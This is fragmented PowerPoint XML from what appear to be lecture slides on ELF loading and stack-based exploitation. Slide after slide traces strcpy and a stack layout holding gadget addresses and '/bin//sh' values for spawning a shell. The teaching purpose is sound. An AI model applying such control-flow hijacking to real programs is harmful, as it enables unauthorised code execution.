                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a: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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>8048e44</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e45</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e47</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e4a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e4d</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e50</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e52</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e56</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e59</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e5c</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e61</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e66</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e67</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Right Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4697515" y="368827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4" name="TextBox 23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2858438" y="4455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0xbffff628</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1509855363"/>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fi-FI" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x68732f2f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0x080ea064</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0x6e69622f</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365</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="61161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71290" y="626171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0xbffff5ec</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Table 10"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1486701445"/>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0xa</a:t>
                      </a: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0xbffff5f0</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0x0806e91a</a:t>
                      </a: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16636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4" name="TextBox 23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2858438" y="4455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0xbffff628</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1278372117"/>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fi-FI" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x68732f2f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0x080ea064</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0x6e69622f</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366</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="574251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71290" y="626171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0xbffff5ec</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Table 10"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="254468442"/>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0xa</a:t>
                      </a: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0xbffff5f4</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0x0806e91b</a:t>
                      </a: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42271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4" name="TextBox 23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2858438" y="4455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0xbffff628</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1018953270"/>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fi-FI" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x68732f2f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0x080ea064</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0x6e69622f</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367</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="538855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71290" y="626171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0xbffff5ec</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Table 10"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1954394135"/>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0xa</a:t>
                      </a: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0xbffff5f8</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7222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4" name="TextBox 23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2858438" y="4455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0xbffff628</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1944647274"/>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58438" y="4455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0xbffff628</a:t>
            </a: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fi-FI" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x68732f2f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0x080ea064</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0x6e69622f</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368</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="502476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71290" y="626171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0xbffff5ec</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Table 10"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="976781693"/>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0x6e69622f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0xbffff5fc</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0x080bb6d7</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97240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06176760"/>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58438" y="4455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0xbffff628</a:t>
            </a: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fi-FI" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x68732f2f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0x080ea064</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0x6e69622f</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369</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="465113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71290" y="626171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0xbffff5ec</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Table 10"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1991336485"/>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0x6e69622f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0xbffff600</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123616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4049165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Loading and Execution</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When a program is invoked, the operating system creates a process to execute the program</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The ELF file is parsed and parts are copied into memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In Linux /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>proc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt;/maps shows the memory layout of a process</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Relocation of objects and reference resolution is performed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The instruction pointer is set to the location specified as the start address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Execution begins</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="145370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58438" y="4455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0xbffff628</a:t>
            </a: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fi-FI" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x68732f2f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0x080ea064</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0x6e69622f</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370</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="465113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71290" y="626171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0xbffff5ec</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Table 10"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="990074768"/>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0x6e69622f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a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffff600</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0x0809a67f</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151146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2007148547"/>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58438" y="4455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0xbffff628</a:t>
            </a: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fi-FI" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x68732f2f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0x080ea064</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0x6e69622f</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371</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="428266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71290" y="626171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0xbffff5ec</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Table 10"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="55547292"/>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0x6e69622f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0xbffff604</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16636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483328820"/>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58438" y="4455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0xbffff628</a:t>
            </a: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fi-FI" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x68732f2f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0x080ea064</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0x6e69622f</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372</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="39287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71290" y="626171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0xbffff5ec</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Table 10"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1891795333"/>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0x6e69622f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0x080ea064</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0xbffff608</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0x0806e91b</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42271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575433846"/>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58438" y="4455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0xbffff628</a:t>
            </a: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fi-FI" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x68732f2f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0x080ea064</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0x6e69622f</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373</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3545242"/>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71290" y="626171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0xbffff5ec</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Table 10"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1497371834"/>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0x6e69622f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0x080ea064</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0xbffff60c</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70218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908767896"/>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58438" y="4455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0xbffff628</a:t>
            </a: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fi-FI" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x68732f2f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0x080ea064</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0x6e69622f</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374</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="318144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71290" y="626171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0xbffff5ec</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Table 10"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2071091099"/>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fi-FI" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x68732f2f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0x080ea064</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0xbffff610</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0x080bb6d7</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97240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2115038492"/>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58438" y="4455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0xbffff628</a:t>
            </a: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fi-FI" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x68732f2f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0x080ea064</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0x6e69622f</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375</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="281765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71290" y="626171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0xbffff5ec</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Table 10"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1821904541"/>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fi-FI" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x68732f2f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0x080ea064</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0xbffff614</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123616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265666670"/>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58438" y="4455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0xbffff628</a:t>
            </a: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fi-FI" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x68732f2f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0x080ea064</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0x6e69622f</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376</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="281765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71290" y="626171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0xbffff5ec</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Table 10"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1857171607"/>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fi-FI" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x68732f2f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0x080ea064</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0xbffff614</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0x0809a67f</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152129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927781661"/>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58438" y="4455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0xbffff628</a:t>
            </a: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fi-FI" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x68732f2f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0x080ea064</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0x6e69622f</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377</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="247352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71290" y="626171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0xbffff5ec</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Table 10"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2019390503"/>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fi-FI" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x68732f2f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0x080ea064</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0xbffff618</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16636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955873351"/>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58438" y="4455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0xbffff628</a:t>
            </a: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fi-FI" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x68732f2f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0x080ea064</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0x6e69622f</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378</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="209080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71290" y="626171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0xbffff5ec</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Table 10"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="351741229"/>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fi-FI" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x68732f2f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0xbffff61c</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0x0806e91b</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42271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064626733"/>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58438" y="4455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0xbffff628</a:t>
            </a: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fi-FI" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x68732f2f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0x080ea064</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0x6e69622f</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379</a:t>
            </a:fld>
